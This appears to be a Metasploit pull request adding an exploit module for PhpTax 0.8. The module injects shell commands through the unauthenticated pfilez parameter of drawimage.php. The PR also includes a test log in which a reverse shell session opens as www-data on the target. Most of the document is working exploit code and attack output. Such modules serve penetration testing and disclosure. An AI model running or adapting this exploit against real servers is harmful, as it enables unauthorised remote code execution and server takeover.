### PR TITLE
Add PhpTax pfilez exec module

### DIFF
--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -1,0 +1,87 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "PhpTax pfilez Parameter Exec Remote Code Injection",
+			'Description'    => %q{
+					This module exploits a vulnerability found in PhpTax, an income tax report
+				generator.  When generating a PDF, the icondrawpng() function in drawimage.php
+				does not properly handle the pfilez parameter, which will be used in a exec()
+				statement, and then results in arbitrary remote code execution under the context
+				of the web server.  Please note: authentication is not required to exploit this
+				vulnerability.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Jean Pascal Pereira <pereira[at]secbiz.de>',
+					'sinn3r'  #Metasploit
+				],
+			'References'     =>
+				[
+					['EDB', '21665']
+				],
+			'Payload'        =>
+				{
+					'Compat' =>
+					{
+						'PayloadType'  => 'cmd',
+						'RequiredCmd'  => 'generic perl ruby bash telnet',
+					}
+				},
+			'Platform'       => ['unix', 'linux'],
+			'Targets'        =>
+				[
+					['PhpTax 0.8', {}]
+				],
+			'Arch'           => ARCH_CMD,
+			'Privileged'     => false,
+			'DisclosureDate' => "Oct 8 2012",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The path to th web application', '/phptax/'])
+			], self.class)
+	end
+
+
+	def check
+		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+		res = send_request_raw({'uri'=>target_uri.path})
+		if res and res.body =~ /PHPTAX by William L\. Berggren/
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Unknown
+		end
+	end
+
+
+	def exploit
+		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+
+		print_status("#{rhost}#{rport} - Sending request...")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => "#{target_uri.path}drawimage.php",
+			'vars_get' => {
+				'pdf'    => 'make',
+				'pfilez' => "xxx; #{payload.encoded}"
+			}
+		})
+
+		handler
+	end
+end

--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptString.new('TARGETURI', [true, 'The path to th web application', '/phptax/'])
+				OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
 			], self.class)
 	end
 

--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -37,8 +37,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'Compat' =>
 					{
-						'PayloadType'  => 'cmd',
-						'RequiredCmd'  => 'generic perl ruby bash telnet',
+						'ConnectionType' => 'find',
+						'PayloadType'    => 'cmd',
+						'RequiredCmd'    => 'generic perl ruby bash telnet python'
 					}
 				},
 			'Platform'       => ['unix', 'linux'],


### PR DESCRIPTION
This module exploits a vuln found in PhpTax.  When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and results in arbitrary code execution.

Test:

```
msf  exploit(phptax_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] 10.0.1.580 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo XKIxxuB3YxoD9ozE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "XKIxxuB3YxoD9ozE\r\n"
[*] Matching...
[*] B is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command shell session 2 opened (10.0.1.3:4444 -> 10.0.1.5:52472) at 2012-10-08 12:45:33 -0500
[*] Command: echo waVTbmrWXre4wbJb;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "waVTbmrWXre4wbJb\r\n"

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
